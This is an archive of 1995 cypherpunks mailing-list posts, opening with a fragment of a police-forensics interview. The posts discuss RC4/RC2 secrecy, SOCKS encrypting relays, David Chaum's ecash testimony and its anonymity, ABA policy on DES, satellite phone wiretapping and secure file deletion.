One of our biggest problems is getting around passwords and
encryption.  Not the base passwords -- they're easy to get around --
but the passwords on the applications themselves, and encryption can
be very difficult to crack.

We do have special programs to get around them, but you need
individual ones for each application.  The programs can crack most
Microsoft applications in minutes, but some, Paradox for example, are
a lot harder.

The biggest headaches are the pocket organisers from Psion or Sharp.
On a PC you have password protection, but you can always get in
through the motherboard, but with a Psion you can't get in without the
manufacturer's assistance.


Interviewer:  Ken Luxford
Interviewee:  Andrew Johnson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Thu, 27 Jul 95 10:40:39 PDT
To: stopak@orionsci.com (Noam Stopak)
Subject: Re: patented vs secret (was Re: RC4)
Message-ID: <v01520d03ac3d80cdd20a@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>> By the way, since RSA is such a vocal opponent of the Clipper chip on the
>> grounds of its secret Skipjack algorithm, why does it market secret
>> algorithms like RC4 and RC2?  Does this seen like a double face to anyone
>> else?
>>
>> -----------------------------------------------------------
>> Russell Ross                     email: rross@sci.dixie.edu
>> 1260 N 1280 W                    voice: (801)628-8146
>> St. George, UT 84770-4953
>
>Patented does not equal secret.  The argument against Clipper (at least one
>of them ;-), is that it has not been subjected to review outside of the NSA.
>
>I believe the code for RC4 and RC2 is accessible and has been subjected to
>review by many in the crypto field - you just can't use it legally without
>a license.
>
>Noam

Source code for them is available for $25,000, but only binaries are
available otherwise.  The source code for RC4 was leaked or
reverse-engineered, so it is widely known now, but RSA has never released
the algorithm officially.  I have found no documentation on the algorithm
behind RC2.  They are in fact secret, proprietary algorithms, with the
exception of the unofficial RC4 code.

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 26 Jul 95 22:17:48 PDT
To: perobich@ingr.com
Subject: Re: Netscape the Big Win
In-Reply-To: <199507261447.AA17788@poboy.b17c.ingr.com>
Message-ID: <Pine.LNX.3.91.950727130323.18391A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Paul Robichaux wrote:

> Hal said:
> > This sounds very good if it already is almost working.  The TCP
> > connection which is opened would have to be to a server on the local
> > machine, so it would be important that the software support that.  Also,
> > the local SOCKS relay would of course not want its winsock calls to be
> > intercepted and translated in this way, so there would need to be some
> > alternative way to access "vanilla" winsock.  Can you give any
> > more information on the NEC work?
> 
> This should be fairly straightforward: take the existing winsock.dll
> or winsock32.dll and rename it. Install the NEC DLL with the old
> winsock's name, then have the NEC DLL do a LoadLibrary() to attach the
> original version.

In any case, Trumpet Winsock has got a buit-in socksifier, even in the 
non-time-limited version 2.0b. It's activated by the "Firewall setup" 
dialogue box, and seems to work: I've just tested it with a sockd 4.2b 
running on a Linux box. NEC's DLL will add the same functionality to 
other stacks, but experimental encrypting relays could be tested right 
now with Trumpet Winsock.

Think about it, this could be the ultimate encryption hook: I don't think 
that NSA could arrive to ban firewall support...

Now for a catchy name for SOCKS-based encrypting relays: what about 
"SafeSox"? :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stopak@orionsci.com (Noam Stopak)
Date: Thu, 27 Jul 95 10:33:19 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: patented vs secret (was Re: RC4)
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <9507271733.AA05542@orionsci.com>
MIME-Version: 1.0
Content-Type: text


> 
> By the way, since RSA is such a vocal opponent of the Clipper chip on the
> grounds of its secret Skipjack algorithm, why does it market secret
> algorithms like RC4 and RC2?  Does this seen like a double face to anyone
> else?
> 
> -----------------------------------------------------------
> Russell Ross                     email: rross@sci.dixie.edu
> 1260 N 1280 W                    voice: (801)628-8146
> St. George, UT 84770-4953

Patented does not equal secret.  The argument against Clipper (at least one 
of them ;-), is that it has not been subjected to review outside of the NSA.

I believe the code for RC4 and RC2 is accessible and has been subjected to
review by many in the crypto field - you just can't use it legally without 
a license.

Noam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 27 Jul 95 08:09:57 PDT
To: cyberia-l@birds.wm.edu
Subject: International raids on internet "porn ring"
Message-ID: <2816@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Today's Guardian (uk) reports at page 4, column 2:

[I've edited this down]


       "Police move on Internet porn" 
By Owen Bowcott

       Vice squad officers from eight police forces yesterday took
part in an internationally-co-ordinated operation aimed at
suspected paedophiles who are alleged to have been exchanging
child pornography on the Internet.

       Nine people were arrested in early morning raids in the 
United Kingdom and a further 31 were detained elsewhere in her, 
America, the far east and South Africa.

       Codenamed Operation Starburst, the investigation follows 
growing concerns [about internet porn]  ...

       In the United Kingdom, 13 search warrants were executed 
... Computer equipment was seized.  Those arrested were 
questioned but later released on bail.  [later the article 
reports 9 arrests and 17 computers seized] 

       The inquiry was prompted by officers in the West  
Midlands police commercial vice unit who had identified 
several   Britons they believed were distributing child 
pornography on the Internet.  The Paedophile Unit and the 
National Criminal Intelligence Service made contact with 
overseas police forces to trace people suspected of  trading 
obscene pictures.

       [Detectives then quoted describing how "appalling" and 
"hard core" the pictures were, and saying that the "perverts 
were not making profits from the pictures" just trading them.]
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 27 Jul 95 11:31:48 PDT
To: stopak@orionsci.com (Noam Stopak)
Subject: Re: patented vs secret (was Re: RC4)
In-Reply-To: <9507271733.AA05542@orionsci.com>
Message-ID: <199507271830.OAA22564@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I believe the code for RC4 and RC2 is accessible and has been subjected to
| review by many in the crypto field - you just can't use it legally without 
| a license.

	This is not correct.  RC2 is not public; something that
interoperates with RC4 was posted to cypherpunks & sci.crypt last
year.  Neither have undergone any peer review that has been published
(AFAIK).  A paper on RC5 is listed in the Crypto 95 schedule, but
nothing on RC4.

	Also, the usability of RC4 is very open to question.  Since it
was a trade secret, it was not patented.  Several smart people have
said that once a trade secret becomes well known, its out protections.
But few people want to get a nasty letter ffrom RSA's lawyers, so no
one in the US has released anything with RC4 in it without the RSA
licenses.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 27 Jul 95 14:46:14 PDT
To: cypherpunks@toad.com
Subject: Re:  Sat phone permit "wire"taps
Message-ID: <9507272149.AA07902@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>  "Officials said government police authorities have expressed concern
>that satellite telephone systems may enable people to conduct
>conversations that are out of the earshot of government investigators. 

Perish the thought that We the People might be sovereign.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 27 Jul 95 07:03:23 PDT
To: cypherpunks@toad.com
Subject: Re: Full text of David Chaum's Congressional speech
Message-ID: <Pine.3.89.9507271436.A20183-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 27 Jul 1995, Marcel van der Peijl wrote:

> Ecash itself is less
> prone to abuse than paper bank notes, because privacy is "one-way,"
> which means that an extortionist, a seller on a black-market, or the
> acceptor of a bribe is forever vulnerable to being irrefutably
> incriminated by the party that paid them.

Now, I'm not sure of this, but as far as I can see, if I was a 
blackmailer wanting to receive an untraceable payment I could do the 
following :

	I create my ecash serial number/hash
	I blind it with a random number
	I send it to the payer

	Payer blinds it again and sends it to the bank
	
	Bank signs it and returns it

	Payer removes their blinding and returns the result to me

	I remove my blinding and send it to the bank for payment with
	no chance of being traced.

Will this work ?

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 27 Jul 95 06:09:35 PDT
To: cypherpunks@toad.com
Subject: Full text of David Chaum's Congressional speech
Message-ID: <199507271307.PAA21979@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's the full text of the speech David Chaum gave in his
Congressional hearing. I will also make it available for online 
reading on our web server in the publications section.

--- cut here ---

Mr. Chairman, Members of the Committee:

As an American who is regarded as the inventor of electronic cash,
who has worked over the last dozen or so years to make the technology
viable, and who is now CEO of a leading company pioneering in its
commercialization, I am very pleased by the interest being shown
here and to be here today. 

We are being forced to decide between two very different kinds of
electronic payment technology.  The core values we as a nation have
fought for, and continue to stand for, are at stake.  As a
consequence of choosing one of the two directions, these values will
be profoundly eroded; by choosing the other direction, however, they
will be preserved and likely extended.  Wise decisions at this
critical juncture may also allow us to avoid certain other pitfalls
and to realize economic leadership and growth.

I think my limited time before you is best used to briefly explain
the fundamentally different approaches to security, before coming to
privacy, privacy technology, and its implications.

Security

Security is simply the protection of interests.  People want to
protect their own money and banks their own exposure.  The role of
government is to maintain the integrity of, and confidence in, the
whole system.  With electronic cash, just as with paper cash today,
it will be the responsibility of government to protect against
systemic risk.  This is a serious role that cannot be left to the
micro-economic interests of commercial organizations.

In order for those in government to make informed decisions, it will
be necessary for them to understand the basic ways to secure
transactions in different situations.

One basic form is tamper-resistance, exemplified by the chip in a
chip card.  It is designed to be hard to modify or to read secrets
from. Such tamper-resistance is needed for "off-line"
payments--those in which the reader device receiving payment from a
card, validates payments by contacting a central system only at the
end of each day.

(Incidentally, this and the other basic form must rely for security
on cryptography, sometimes refereed to as encryption, which is
fundamental to all information security.) 

The other basic form is where the individual uses their own computer,
whether a desk-top, lap-top, or palm-top device.  Such "software
only" is all that is needed in an "on-line" system--a system in which
the party receiving payment communicates over a network during each
payment.

The trend is toward a convergence of these two forms into a
hybrid--since people don't want incompatible forms of money and since
it offers the best of both worlds in terms of convenience; in other
words, you will put a chip card into a user-friendly electronic 
device of your own choosing, whether on your desk, in your living
room, or in your pocket.  I have brought some examples of this to
show you...

The problems I see in the industry today reflect a lack architecture. 

And architecture is essential when building infrastructure, which is
what we are embarking on.  In my view, a sound architecture must: (i)
include the two basic forms of security, and allow for their 
integration into the hybrid; (ii) prevent the vulnerability of
system-wide secrets from being stored in every card or, nearly as
bad, every off-line point of payment; and (iii) address privacy
concerns effectively, since they cannot be addressed as add-ons or 
afterthoughts.  Today, DigiCash systems are alone in having any of
these three attributes, and their architecture has all three.

Privacy

Let me now turn to this issue of privacy...

A recent Harris poll of the American public began by introducing
respondents to all the consumer benefits of the information
superhighway.  Then respondents were told that in order to make such
systems economically viable, payment transaction data would have to 
be gathered and used for purposes such as making special offers to
them.  But the majority of respondents still objected to any use,
other than consummation of the payment, and they gave privacy as the
primary reason.

Fully 82% of Americans today expressed concern over privacy of
computerized data.  That fraction has been growing steadily ever
since the "first wave" of privacy concern was triggered when
Americans saw their names punched into computer cards or printed on
computer generated forms.  When people are exposed to the
information superhighway, which provides an awesome glimpse of the
power of modern information technology, with dropping transaction
costs leading to finer granularity of  payments (which we will be
hearing more about later), concern will reach new levels.

Privacy Technology

"Privacy technology" allows people to protect their own information,
and other interests, while at the same time it maintains very high
security for organizations.  Essentially, it is the difference
between, on the one hand, a centralized system with disenfranchised 
participants (like the electronically tagged animals in feedlots);
and, on the other hand, a system where each participant is able to
protect its own interests (like buyers and sellers on a town market
square).

Take ecash as an example of privacy technology.  It provides a fully
digital bearer instrument--a number that is itself money, just like a
bank note is money.  On the Internet, once someone downloads the
requisite software, which takes only a few minutes, they are ready to
send and receive ecash in payments. 

Security of ecash is superior to that of paper cash.  If it is
stolen, it cannot be used; if someone refuses to give you a receipt,
you have proof that they deposited it; and if it is lost, you can get
your money and records back.  Counterfeiting ecash poses the same
cryptographic challenge as breaking the most sophisticated codes
used to protect nuclear materials, military secrets and large-value
wire transfers.  Therefore, ecash is certainly not the target of
opportunity.

Ecash is already being experimented with on the Internet in a
worldwide monopoly money trial with tens of thousands of
participants.  Related card technology has been extensively tested,
by DigiCash licensee Amtech, for highway-speed road tolls and road 
pricing, offering privacy instead of dossiers on everywhere people
drive.  And, CAFE, the European Commission sponsored trial, at its
headquarters buildings in Brussels, of chip cards that can be
inserted into electronic wallets (that I have already shown you), 
allows privacy in payments and the electronic ECU.  Such "privacy
technology" was even successfully used by the participants at the
most recent international meeting of data protection commissioners. 

Ecash has received substantial media coverage; consequently, the
public is beginning to realize that the coming of electronic payments
need not mean an obliteration of privacy.  And the superhighway will
give consumers unprecedented mobility to choose it.  Some concern
about ecash, however, has been raised by various parties over
possibilities it might open for illicit payments.  But there is
simply no legitimate basis for these allegations.

Ecash, even when it achieves significant scale, is considerably less
dangerous to society than automatic teller machines.  For one thing,
like cash, the amount withdrawn and deposited is on record; but, for
another, unlike cash, the amounts of money that pass through each
person's hands are also on record at the bank.  Ecash itself is less
prone to abuse than paper bank notes, because privacy is "one-way,"
which means that an extortionist, a seller on a black-market, or the
acceptor of a bribe is forever vulnerable to being irrefutably
incriminated by the party that paid them.

National Leadership

Governments who stifle the new technology while it is still in its
infancy, before its has had a chance to develop and harmonize with
our institutions; who don't pro-actively support needed
infrastructure; or who fail to establish confidence by protecting
against systemic risk--will be left behind in global competition. 
Countries who take clear positions based on understanding of the
technology, however, and encourage needed developments, stand to gain
enormous economic growth and market leadership.  Privacy technology,
whether used for electronic payments, voting, or other public
expression, is the electronic equivalent of a free market and
democracy.  People will come to insist on it as an informational
human right.

Dr. David Chaum, DigiCash

--- cut here ---

// Marcel van der Peijl, DigiCash bv
// http://www.digicash.com/~bigmac/
// There is no signature like no signature!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 27 Jul 95 14:49:03 PDT
To: cypherpunks@toad.com
Subject: Attachments, crypto, et al
Message-ID: <199507272147.PAA25723@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My rule is no binaries, none of the time. Grepping for whitwater and foster
and routing it to /dev/null seems like a good idea too.. And a great big 
*plonk* to our alt.conspiracy friends... Need to learn what a pointer is...

Anyway, my tri-county crime spree for the next weeks will put me in San
Francisco, Alameda, and Orange counties. If anyone wants to mutually sign
keys, email me and I'll try to arrange something.

Unfortunately my cryptoshirt won't arrive in time. I'd be able to wear it
in front of LOTS of illegal aliens. So, to make up for it, I'm going to
export part of the cryptosig: #

Have a nice day.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMBgIxcLa+QKZS485AQFmVAMA0AijobnuJaumiM3LKfwdUK/ENRlbadJ2
DmElG3VDRaYtx4PNPXtjVXkV3CMt2CHEEvs4nmIlieZgOn/UkK0yWDbz95+qhul/
SCwOZ7jWHrika/pJKy2UX4HaEyjHtyvq
=GXbe
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Thu, 27 Jul 95 13:59:31 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Chiding: (was Re: Banks and Crypto)
In-Reply-To: <v02130500ac3c4aceee4e@hal9001.dialup.access.net>
Message-ID: <qT/FwMz2BwJf083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a friendly toasting, not a flame:
You are totally correct in beseeching this person to use a little
sense with unnecessary abuse of attachments.  This has rapidly grown
to be one of my own pet peeves, as mail agents automaticly abuse MIME
without their users probably even knowing what's happening.

BUT: (as I hope you already realize) It is not necessary to send your
lecture to the whole list!  This failure to edit down the recipient list
is another variant of the same transgression you are complaining of.
(At the very least, you could change the subject line, like I am now
going to force myself to do in this message).

On Wed, 26 Jul 1995 23:29:55 -0400,
"Robert A. Rosenberg" <hal9001@panix.com> wrote:
} At 13:25 7/26/95, KDAGUIO@aba.com wrote:
} >See attached file: F:\OFFILES\KODMAIL.MSG
} >
} >
} >
} >Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B)
} 
} 
} Is there ANY reason why you did not just paste the text of this file into
} your message? Also, if you are going to attach files in lieu of writing
} messages, it might be useful to mention what Wordprocessor was used to
} create the file so it can be read. In this case, what format is your file
} in?
} 
} Thank you.
} 
} 
} 

::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
:: Lou Poppler  <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
::::::::::::::::::::::::::::::::::::::   soon (and My Reply).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Thu, 27 Jul 95 13:25:55 PDT
To: cypherpunks@toad.com
Subject: Sat phone permit "wire"taps
Message-ID: <kk5zLvz0BwwMNhfwZg@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I found these paragraphs in a recent Space News interesting.  They were
at the end of an article titled "Military Officials Open To Using
Civilian Links" in the July 3rd issue. 

  "Officials said government police authorities have expressed concern
that satellite telephone systems may enable people to conduct
conversations that are out of the earshot of government investigators. 
This would be particularly true in an area where, for example, there
were no gateway through which government investigators could tap into
calls. 
  "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
features to permit authorized eavesdropping, officials said. 
  "``Iridium will include a leased land line to areas where there are
now local gateways to permit monitoring,'' Johnson said.  ``We are
willing to put the technical capability to do this in the hands of the
governments.  They then will have to pay to have all those people listen
to all those telephone calls.''" 

Ted Anderson 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 27 Jul 95 14:11:27 PDT
To: Censored Girls Anonymous <carolab@censored.org>
Subject: Re: You have cashed my check....
In-Reply-To: <Pine.BSI.3.91.950725170206.8971A-100000@usr4.primenet.com>
Message-ID: <8k601XmMc50e1Dw2ZC@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


First of all, let me publicly apologize for any role we may have played
in your problem.  I don't yet know if there's a bug in our system or
EDS' system that caused this to happen, but if so I assure you it will
be found and fixed.  We are investigating.

I am responding now -- in advance of any real facts to offer you --
primarily because you sent a CC of your mail to so many public lists. 
The "humanhelp" address on your mail will feed into a complex customer
support department, from which you should already have received an
automatic acknowledgement and a "tracking code".  You should receive a
response from one of our human operators within 48 hours.  However, the
way that the humanhelp software works, those answers will NOT
automatically be CC'ed to cypherpunks and all the other places you CC'ed
your question.  Therefore I am answering you now in order to assure
everyone who saw your message (via those widespread CC's) that it is
indeed being handled through the normal channels, but that FV's
responses will not be widely cc'ed.  It will come to you alone, as
private mail.

In general, it isn't necessary to CC the world on your first interaction
with a customer service department; perhaps if you had sent us several
messages and we hadn't answered you, this would have been an appropriate
response.  As it is, the situation is almost certainly either a human
error in the data entry for your bank account or a hitherto-undiscovered
software bug.  But we have many happy sellers who can attest to the fact
that we do regularly deposit money in their bank accounts.  It's not a
scam.  Please don't assume the worst until you give us a chance to
diagnose and fix the problem.

(In fact, if it were a scam, why would we send you an alarming-looking
letter telling you that your bank account information appears to be
invalid?  It seems to me that it would be much smarter for us to just
quietly eat your money, if that's what we wanted to do!)

I assume that you did not, in fact, close or otherwise change your bank
account -- if you did, that would certainly explain the whole episode,
and our system would be functioning completely as intended.  We will
proceed in our investigation under the assumption that this is not the
case, and will let you know (via private email) what we find out.  At
some point, someone may need to contact you via telephone to verify your
account information.  Stay tuned.  -- Nathaniel

--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 27 Jul 95 14:31:07 PDT
To: cypherpunks@toad.com
Subject: Zyxel 28.8K/ISDN modem support of DES
Message-ID: <m0sbaVj-0009tGC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


The data sheets for the new Zyxel modems (Elite 2864/2864I) mentions that
they include DES capability.  The fully ISDN 2864I without/with NT-1
retails for $699/$749.  Only the I model (with built-in complete ISDN)
supports DES according to the data sheet.

2864 retails for $549 and they have a non-ISDN modem even cheaper.

They support almost every conceivable feature, including ISDN on both
B channels, ISDN on one with analog conversion on the other, and
built-in microphone and speaker jacks to better support voice
capability. (The 1496E's could be used as voice mail systems, etc.)

Firmware in flash EPROMS (8MBit) and supports 8MByte DRAM sockets for
addon memory (used to support buffering for it's plain paper fax
conversion to the built-in parallel port (without computer help)).

Of course, hard to tell if there's any way to control audio recording/playing
while having an active data connection with the standard eprom.

IF you could find out how to control it OR if there is a way to communicate
in a multichannel way to the various 'peripherals', then you could produce
a pretty nifty PGP-Voice system.

I didn't mention lots of other features (most inherited from the 1496's):
Caller-ID, distinctive ring, touch tone recognition, V.42bis over ISDN,
460.8KBPS/serial.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 27 Jul 95 15:47:29 PDT
To: fc@all.net
Subject: Full text of David Chaum's Congressional speech
In-Reply-To: <9507271344.AA17685@all.net>
Message-ID: <199507272242.AA05163@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Just wondering, but do you have a cost breakdown for the
figure of $ 500.00 for a "cash card?" 

Would this be a single-unit manufactured-in-one-piece card
or something else?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 27 Jul 95 09:47:11 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Full text of David Chaum's Congressional speech
In-Reply-To: <199507271636.JAA26799@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9507271752.A20183-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 27 Jul 1995, Hal wrote:

> There are some technical counter-measures though.  One is to have some
> secure tamper-proof hardware which enforces certain kinds of ecash
> transfers. 

Yes, that's what I was thinking too... you'd have to hack the software 
to do it with the current Ecash implementation, but it ought to be 
possible if you had to.

> IMO payee anonymity will be a desired feature of
> ecash systems and I think Chaum is making a mistake claiming that it will
> not or should not exist.

Yep, I agree...

> Another quibble is that blackmail is not a good example. 

Ooops... brainfade.. yes you're right 8-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 27 Jul 95 15:58:58 PDT
To: Ted_Anderson@transarc.com
Subject: Sat phone permit "wire"taps
In-Reply-To: <kk5zLvz0BwwMNhfwZg@transarc.com>
Message-ID: <199507272254.AA06257@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ted_Anderson@transarc.com

   I found these paragraphs in a recent Space News interesting.  They were
   at the end of an article titled "Military Officials Open To Using
                                    ^^^^^^^^^^^^^^^
   Civilian Links" in the July 3rd issue. 

[...]
     "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
   features to permit authorized eavesdropping, officials said. 

Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs?

It's a pity that the military has decided that in its zeal to listen
in on phone calls, that national security is an expendable asset.

It looks like the Chinese or Russian Armies won't be any better by
the time they're occupying us, unfortunately.

(The really awful part is that what friends I have that are current
or past U.S. military don't want to die, AFAIK).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KDAGUIO@aba.com
Date: Fri, 28 Jul 95 05:46:42 PDT
To: cypherpunks@toad.com
Subject: Banks and Crypto - Again
Message-ID: <s0189f37.020@aba.com>
MIME-Version: 1.0
Content-Type: text/plain



I apologize for the earlier transmission error/offense.
Our server has been down intermittently so I have not received
many flames yet.  The meeting mentioned has already taken place
resulting in significant progress toward our goals.
The server is now up.  Flame away my friends.
                                                ...kawika...
******************************************************************

CONTACT:  Sonia Barbara                         FOR IMMEDIATE
RELEASE
              (202) 663-5469                                                              
(1995)

ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL 
OF CRYPTOGRAPHY

Association Recommends a 10-year Extension for the Data
Encryption Standard

     WASHINGTON, July 21 -- The Data Encryption Standard (DES)
should be recertified for at least 10 more years to allow
interested financial institutions adequate time to convert to any
new cryptography standard, the American Bankers Association said
in a policy statement issued today.
     Encryption is the process whereby sensitive data
communications, such as wire transfers, credit card and automated
teller machine transactions, are protected by secret codes to
protect their confidentiality.   DES, released in 1977, is the
primary method used by financial institutions to encrypt
information.
     Critics say that the longer DES is used, the more likely its
code could be broken.  While realizing this could limit its life
span as a government certified standard, ABA warned that
requiring banks to convert to a new standard by 1998 (the year
DES's certification expires) could be prohibitively costly due to
the high level of electronic funds transfers secured by DES.  ABA
therefore encouraged the National Institute for Standards
and Technology (NIST) to continue to endorse DES as a Federal
Information Processing Standard (FIPS) for use by the financial
community.
     There has been an ongoing debate regarding who should
control the development and support of private-sector computer
security standards:  the government or the private sector.  
ABA strongly recommends that the U.S. government work with the
private sector and Congress in an open forum to develop a
comprehensive policy on the commercial use of cryptography. 
     In its newly-revised policy statement on cryptography, ABA
proposed alternatives  to DES and outlined other criteria that
must be met before changes in cryptographic standards can be
accepted by the banking industry.   These criteria -- which will
be presented next week to representatives of the White House,
U.S. Department of Commerce, National Security Agency (NSA) and
federal banking agencies -- were developed following a two-day
meeting held in June of bankers, vendors and crypto
experts concerned about the federal government's direction
regarding private-sector information security. 
     Specifically, ABA recommended:
     *  The financial services industry be allowed to continue to
use DES based on risk assessment (e.g. value of the transaction)
and the business application involved. 
     *  A security framework encompassing a family of
commercially available algorithms, including DES, be developed. 
This framework should include a process for negotiated algorithm
selection based on the level of risk and other business
requirements.  
     * Opposition to government mandated key management systems
for financial applications where keys would have to be stored
outside the financial institution  (e.g. key
registration/surrender or the mandatory escrow of cryptographic
keys). 
     Instead, banks should continue to be responsible for key
management and continue to cooperate with government for law
enforcement purposes, as required by law.
     * Export of cryptography for financial applications must not
be restricted.
     * Full participation of Congress and the private sector
before establishing a U.S. policy for the commercial use of
cryptography, instead of being carried out solely by Executive
Order.
     [Note:  These recommendations were summarized.  For the full
statement, please call Sonia Barbara at 202/663-5469.]
     The American Bankers Association is the only national trade
and professional association serving the entire banking
community, from small community banks to large bank holding
companies.  ABA members represent approximately 90 percent of the
commercial banking industry's total assets, and about 94 percent
of ABA members are community banks with assets less than $500
million.
                                   ###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@hiof.no>
Date: Thu, 27 Jul 95 11:10:50 PDT
To: "j. ercole" <joee@li.net>
Subject: Re: mac share/freeware app for overwriting unused hd space?
In-Reply-To: <v01510100ac3d51f81e95@[199.173.75.102]>
Message-ID: <Pine.SUN.3.91.950727200343.1566B-100000@gyda>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, j. ercole wrote:
> Can anyone point me towards a program that's freeware or shareware that
> will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
> sincerely apologise if this is a faq.  I know norton's will do it but I
> don't presently have that installed on my machine.  Thanks oodles,
> joe

I once had a program called Burn, which is another trachcan, but 
overwrites the data X-times. (You choose yourself how many!)
You can get it at:
ftp://ftp.usa.net/users/mdw/mac/burn/

Hope this helps,
- Halvor.

--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Thu, 27 Jul 95 18:18:26 PDT
To: cypherpunks@toad.com
Subject: PS/2 passwd bypassed at bootup?
Message-ID: <Pine.BSD.3.91.950727201615.20637H-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain




I have my crummy IBM PS/2 passwd protected upon turning it on.
I know that removing the battery in a PS/2 deletes the password.
But can it be bypassed by an MIS-type if that person has an 
administration-type of diagnostic/setup/boot-up floppy?

Jon C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Thu, 27 Jul 95 21:44:38 PDT
To: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Subject: copyrighting algorithms
In-Reply-To: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de>
